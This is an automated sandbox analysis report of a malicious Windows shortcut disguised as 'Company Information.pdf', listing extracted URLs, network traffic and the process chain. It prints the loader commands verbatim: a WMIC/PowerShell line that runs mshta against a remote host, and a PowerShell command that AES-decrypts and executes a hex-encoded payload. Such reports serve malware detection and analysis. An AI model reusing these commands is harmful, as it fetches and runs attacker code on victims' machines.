Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.21.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 0000000A.00000002.1305508383.0000025E58589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1305508383.0000025E5859C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBA831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBACE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.c
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.co
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com
Source: mshta.exe, 0000000B.00000002.1545175154.000001FAB78B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/
Source: mshta.exe, 0000000B.00000002.1545175154.000001FAB78B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/.
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/F
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fu
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fue
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/C
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Co
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Com
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Comp
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Compa
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Compan
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBC47A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%2
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20I
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20In
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Inf
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Info
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Infor
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Inform
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Informa
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Informat
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Informati
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Informatio
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Information
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Information.
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Information.p
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Information.pd
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Information.pdf
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBC47A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Fuel/Company%20Information.pdfp
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/L
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Li
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Lig
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Ligh
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/O
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OG
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGC
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCM
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMT
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTY
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTYT
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTYTR
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTYTR.
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTYTR.m
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTYTR.ms
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Light/OGCMTYTR.msi
Source: mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, Company Information.pdf.lnkString found in binary or memory: https://evanbconsultancy.com/Sand/Buddy
Source: mshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddy$
Source: powershell.exeString found in binary or memory: https://evanbconsultancy.com/Sand/Buddy$global:?
Source: mshta.exe, 0000000B.00000003.1531829652.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547258447.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523488640.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1531462649.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522396244.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523025408.00000202BA470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1542373401.00000202BA470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddy...
Source: mshta.exe, 0000000B.00000002.1546902300.00000202BA3CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddy...P&
Source: mshta.exe, 0000000B.00000002.1544911094.000001FAB7820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyC:
Source: mshta.exe, 0000000B.00000002.1545476268.000001FAB7960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyH
Source: mshta.exe, 0000000B.00000002.1547904483.00000202BE42B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyLMEMP
Source: mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyRRC:
Source: mshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyV
Source: powershell.exe, 0000000A.00000002.1304752010.0000025E56780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyVBE;.JS;.JSE;.
Source: mshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyX
Source: mshta.exe, 0000000B.00000003.1531658058.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB7895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddyft
Source: powershell.exe, 0000000A.00000002.1305508383.0000025E589EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddyh
Source: mshta.exe, 0000000B.00000003.1533016042.00000202BE745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddyhttps://evanbconsultancy.com/Sand/Buddy
Source: mshta.exe, 0000000B.00000003.1542410574.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545347428.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyinC:
Source: powershell.exe, 0000000A.00000002.1305508383.0000025E58541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/Buddyp
Source: mshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/Sand/BuddyqSV
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/comments/feed/
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/feed/
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.8.7
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBACE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evanbconsultancy.com/wp-json/
Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000E.00000003.1332911010.000001F6FD880000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCAB2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBC503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBBB0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 0000000B.00000003.1522254832.000001FAB78D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545237143.000001FAB78D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: ReaderMessages.17.drString found in binary or memory: https://www.adobe.co
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 84.32.84.121:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 84.32.84.121:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 84.32.84.121:443 -> 192.168.2.7:49723 version: TLS 1.2

System Summary

barindex
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000002.00000002.1277312319.0000029D2CA0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')"""memstr_64d2dfcf-0
Windows shortcut file (LNK) contains suspicious command line arguments
Source: Company Information.pdf.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2745
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2745Jump to behavior
Source: classification engineClassification label: mal100.evad.winLNK@28/62@3/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fm22fcu.zt1.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: WMIC.exe, 00000002.00000002.1277312319.0000029D2CA05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Select*fromWin32_Process;
Source: Company Information.pdf.lnkReversingLabs: Detection: 28%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Company%20Information.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
